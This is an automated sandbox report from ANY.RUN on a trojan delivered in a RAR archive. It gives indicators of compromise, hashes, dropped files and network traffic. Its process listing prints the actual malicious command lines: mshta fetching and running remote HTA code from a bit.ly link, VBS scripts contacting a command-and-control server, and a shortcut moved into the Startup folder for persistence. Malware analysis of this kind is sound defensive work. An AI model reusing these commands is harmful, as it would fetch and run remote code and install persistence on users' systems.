analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

3249e2eb1eaa628dcf7c83062463bc6bad36515b130e760333da98ea8ffd362e.rar

Full analysis: https://app.any.run/tasks/67ebd848-26f8-4cb3-9a1f-8ff4f3a0c12e
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: March 31, 2020, 02:30:16
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

B43FE451A3C763201A14541120A1D85E

SHA1:

5598E91EF16C20EB9017B1251F069C0CF6DCD00F

SHA256:

5680BC2C24051572E2CE56DA9F2722AEF824FF6FEFB5937C3558C91E8CE0706C

SSDEEP:

24:ZOrpEiMQ2drsJ11dqF973U0XCIGP8FZWx8MiIAU:ZSpxM3drsJvSn5ZWx8pIAU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Connects to CnC server

      • mshta.exe (PID: 3792)
    • Changes settings of System certificates

      • mshta.exe (PID: 3792)
  • SUSPICIOUS

    • Creates files in the user directory

      • mshta.exe (PID: 3792)
    • Executes scripts

      • cmd.exe (PID: 2628)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 3792)
      • WinRAR.exe (PID: 2736)
    • Reads Internet Cache Settings

      • mshta.exe (PID: 3792)
      • wscript.exe (PID: 3284)
      • wscript.exe (PID: 3292)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 3488)
    • Adds / modifies Windows certificates

      • mshta.exe (PID: 3792)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 3792)
    • Reads settings of System Certificates

      • mshta.exe (PID: 3792)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
8
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winrar.exe no specs cmd.exe no specs mshta.exe cmd.exe no specs notepad.exe no specs cmd.exe no specs wscript.exe wscript.exe

Process information

PID
CMD
Path
Indicators
Parent process
2736"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\3249e2eb1eaa628dcf7c83062463bc6bad36515b130e760333da98ea8ffd362e.rar"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3488"C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://bit.ly/2UiZH6VC:\Windows\System32\cmd.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3792C:\Windows\System32\mshta https://bit.ly/2UiZH6VC:\Windows\System32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
1720"C:\Windows\System32\cmd.exe" /C "ECHO risk2020>C:\Users\admin\AppData\Local\Temp\Password.txt&NOTEPAD.EXE C:\Users\admin\AppData\Local\Temp\Password.txt&DEL C:\Users\admin\AppData\Local\Temp\Password.txt"C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
680NOTEPAD.EXE C:\Users\admin\AppData\Local\Temp\Password.txtC:\Windows\system32\notepad.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2628"C:\Windows\System32\cmd.exe" /c start /b wscript "C:\Users\admin\AppData\Local\Temp\iilbat.vbs" 88.204.166.59:8080/edit 1 & start /b wscript "C:\Users\admin\AppData\Local\Temp\iilbat.vbs" 88.204.166.59:8080/edit 2 & move "C:\Users\admin\AppData\Local\Temp\Xbox.lnk" "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3292wscript "C:\Users\admin\AppData\Local\Temp\iilbat.vbs" 88.204.166.59:8080/edit 1 C:\Windows\system32\wscript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.8.7600.16385
3284wscript "C:\Users\admin\AppData\Local\Temp\iilbat.vbs" 88.204.166.59:8080/edit 2 C:\Windows\system32\wscript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.8.7600.16385
Total events
4 437
Read events
851
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
5
Unknown types
4

Dropped files

PID
Process
Filename
Type
3792mshta.exeC:\Users\admin\AppData\Local\Temp\Cab3FFA.tmp
MD5:
SHA256:
3792mshta.exeC:\Users\admin\AppData\Local\Temp\Tar3FFB.tmp
MD5:
SHA256:
3792mshta.exeC:\Users\admin\AppData\Local\Temp\Xbox.lnk
MD5:
SHA256:
3792mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619der
MD5:DE258D014D52CEE566B7A030B495EAFF
SHA256:25CC9F040653782203C0E3497C56CA3AD41479BA9C6C18F459C2C915B9D973C4
3792mshta.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\QTO7CY0H.txttext
MD5:250D34C0104F69BCBCE9E1FE4A7C43A7
SHA256:605ACC828E4E0B4F2A0F8F1388E61FB37DD854F8C6FAA26917C8A0A47E1374DD
2736WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa2736.20592\Password.txt.lnklnk
MD5:F4D2B31353720527E1114AEBFDE0C6C9
SHA256:CFBCD8B9F4E92856EFD47EBCF48D78F704E38B555A0A97693CC52C800BDF2A7E
3792mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\edit[1]html
MD5:7FA5497ECFC96BD8E042DECFEADD9106
SHA256:33119A4E140F14619D5EB7EDA4A1BD3342280FDBFA85BAD7045E61418C3B3B3A
1720cmd.exeC:\Users\admin\AppData\Local\Temp\Password.txttext
MD5:6B733DFA4347AAE014B02C5A1142088D
SHA256:3C3066761BDCC0F3D12B90E1D42997EFAA67F24946F8B31A501CACCB0317876C
3792mshta.exeC:\Users\admin\AppData\Local\Temp\iilbat.vbstext
MD5:CE09CDB7979FB9099F46DD33036B9001
SHA256:583BC1607CA8AAFA0B6EE9A4C6870085EF3F5F1823456F930EF32B0BF2229867
3792mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\2UiZH6V[1].htmhtml
MD5:D6C4D45E95CAE9910E1F9BA242CDB4DE
SHA256:6E6C934602E08EB5AF61C93FF68F0D203EA25ABCF86888BBC48CCC14341FB9D6
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
7
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3792
mshta.exe
GET
200
88.204.166.59:8080
http://www.cloudfiles.club:8080/edit?id=T8YJQTVktMp8W%2Bj/W5EvDWglxOnw8evApd1RaERyZzz/Qzh2uXI/OIlDzMTGaoc57qLEkLRpQt5RK8enWJAvRA%3D%3D
KZ
html
2.32 Kb
malicious
3284
wscript.exe
POST
200
88.204.166.59:8080
http://88.204.166.59:8080/edit?topic=v225&session=115964182&isbn=1269801
KZ
text
2 b
malicious
3792
mshta.exe
GET
200
72.21.91.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAx5qUSwjBGVIJJhX%2BJrHYM%3D
US
der
471 b
whitelisted
3292
wscript.exe
POST
200
88.204.166.59:8080
http://88.204.166.59:8080/edit?topic=v225&session=796896801&isbn=1269801
KZ
text
2 b
malicious
3792
mshta.exe
GET
200
72.21.91.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRJ9L2KGL92BpjF3kAtaDtxauTmhgQUPdNQpdagre7zSmAKZdMh1Pj41g8CEAy%2BK8lPT%2B%2Fr4u1gFxGeJoE%3D
US
der
471 b
whitelisted
3292
wscript.exe
POST
200
88.204.166.59:8080
http://88.204.166.59:8080/edit?topic=s9819
KZ
text
6.82 Kb
malicious
3284
wscript.exe
POST
200
88.204.166.59:8080
http://88.204.166.59:8080/edit?topic=s9819
KZ
text
6.82 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3792
mshta.exe
67.199.248.10:443
bit.ly
Bitly Inc
US
shared
3792
mshta.exe
72.21.91.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
3284
wscript.exe
88.204.166.59:8080
www.cloudfiles.club
JSC Kazakhtelecom
KZ
malicious
88.204.166.59:8080
www.cloudfiles.club
JSC Kazakhtelecom
KZ
malicious
3292
wscript.exe
88.204.166.59:8080
www.cloudfiles.club
JSC Kazakhtelecom
KZ
malicious
3792
mshta.exe
88.204.166.59:8080
www.cloudfiles.club
JSC Kazakhtelecom
KZ
malicious

DNS requests

Domain
IP
Reputation
bit.ly
  • 67.199.248.10
  • 67.199.248.11
shared
ocsp.digicert.com
  • 72.21.91.29
whitelisted
www.cloudfiles.club
  • 88.204.166.59
malicious

Threats

PID
Process
Class
Message
3284
wscript.exe
A Network Trojan was detected
MALWARE [PTsecurity] Connect to a WMI service from VBA (reverse string obfuscation)
3292
wscript.exe
A Network Trojan was detected
MALWARE [PTsecurity] Connect to a WMI service from VBA (reverse string obfuscation)
3 ETPRO signatures available at the full report
No debug info